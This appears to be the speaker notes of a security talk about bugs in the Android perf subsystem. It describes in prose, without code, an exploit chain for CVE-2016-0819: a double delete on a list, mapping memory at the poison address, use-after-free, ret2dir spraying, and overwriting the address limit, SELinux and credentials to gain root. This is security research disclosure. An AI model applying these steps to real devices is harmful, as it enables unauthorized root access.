  1. Performance counters for Linux are a new kernel-based subsystem that provide a framework for performance analysis. They cover both hardware features and software features
  2. Syscall perf_event_open is enabled on most of the latest smart phones. There is no strong relationship between the Android version and the Android customized Linux version. Vendors can also customize their linux kernel and SElinux policy. Most Android 4.4.4 to 6.0.1 have enabled this syscall. An application which has no permission required can invoke this syscall. Many CPU vendors would like to add their PMU to Linux for specific performance testing. These codes will not be merged into the mainline of Linux. So these codes may not be totally reviewed.
  3. Here is the code relationship of perf. Perf Subsystem has many architecture and vendor related codes, many of the codes are added by vendor, not in mainline of Linux. The red square marked the position where the bugs mostly exist.
  4. Here are 4 ways for me to detect bugs in perf. Thanks to these two guys , they released a paper and a perf_fuzzer tool. That helps me a lot. Trinity is a wellkown system call fuzzer.It sometimes help me. Than you should read the codes by yourself and write tools to test specific codes.
  5. I have found five bugs in the perf subsystem of Android. Google has published three of them. CVE-2016-0805 and CVE-2016-0843 are out of boundary access bugs in kernel. Here the unpublished critical bug can root nexus 6P
  6. I will exploit the critical bug CVE-2016-0819 to get root on Nexus 6. This bug exists in all Android Smart Phones which have Qualcomm CPU and Linux version 3.10 series.
  7. Here is the bug related source code. The red lines are added by Qualcomm or Google. Variable constraint_duplicate is added into function perf_release. Once we invoke close() and set variable constraint_duplicate to 1, the event state will be changed from OFF to ACTIVE again.
  8. If we set constraint_duplicate in user space , a double delete on a node will occur.
  9. Here is a test case code. We can use perf_event_open , ioctl and close to trigger this bug - it will then crash the whole system.
  10. But we should remember four key things. Delete does not = free 1,2,3,4
  11. This shows the hlist . Every node has a next pointer which points to the next node, they also have a pprev pointer which points to the previous node. The hlist starts from a list head.
  12. Here is the node delete function of hlist. Deleting one node, the pprev point of the node will be set to list poison2. List poison 2 = 200200 We can then use memory map to put memory space to that address. I use the parameter MAP_POPULATE and mlock to make sure the physical memory is mapped to the virtual address 0x200200 . In March’s Security Bulletin, Google set the LIST_POISON2 to 0x00000200. When the value is smaller than mmap_min_addr it mitigates the problem.
  13. Here I will demo the double delete operation   I assume there are four nodes - node10 to node 40. They are connected with each other.   First I will control node 20   Now node 10 will connect to node 30 and node 30 pprev point will connect to node 10.   Node 20’s pprev point will connect directly to 200200   Next I close node 20. The program will treat the memory in address 200200 as a node. The node 200200 next point will point to node 30.   Now we leak Node 30’s address to user space. Node 20 is now freed.   Then I close node 30 and node 30 is freed   Now Node 10 next point points to a free space. Use After Free
  14. We must create a “grace period” to run hlist_del_rcu. An easy way to do this is calling sleep (). The grace period is a term of RCU.. RCU means read, copy, update. RCU will delay the delete operation But if we invoke sleep () the process will schedule out the CPU. All nodes will be deleted from the list. After sleep () is returned all nodes will need to be added back into the list again. That will create an infinite loop in the list. This is the side effect of invoking sleep(). So how do we refill the freed node?
  15. I try to create this memory layout in kernel. Every 4 perf_event objects are located on one page. But the fd number may not equal the image described. The real situation is more complicated. One process can have only 1024 fds. So fork out more child process makes it easier to create the memory layout
  16. Thanks to these three guys – they supplied the technology that enabled me to spray random data to kernel space and still know where it is.
  17. According to kernel memory reuse rule, I exploited the UAF bug: 1. By continuously exposing the next node address until I found a node, at the start of a page. 2. I then freed one more page to increase the spray success rate. 3. Using ret2dir technology I sprayed data to the node at the beginning of the page. 4. I commanded the kernel to traverse the list and used a function pointer that I controlled.
  18. The root work is very like GeekBen&amp;apos;s TowelRoot Source Code: I set the address limit of the thread to the max number of integers This enabled me to read and write the whole kernal space. Next I set the SElinux enforcing variable to 0 to bypass the SELinux Modifying the credentials and the SELinux security object – we now have the root.
  19. Now I show my exploit here. At the moment it is unstable. It may fail or crash the system. Using adb shell is more successful If I fail I will try again. Now it forks more child processes , every child process has 1000 fds. It increases the memory space to low virtual address. I found a node at page start, and I try to spray data to this address. Opps it failed
  20. Thank you everyone for your attention. Today I have introduced to you, a new Android bug pool to help protect our customers security better. I am happy now to answer any questions you may have.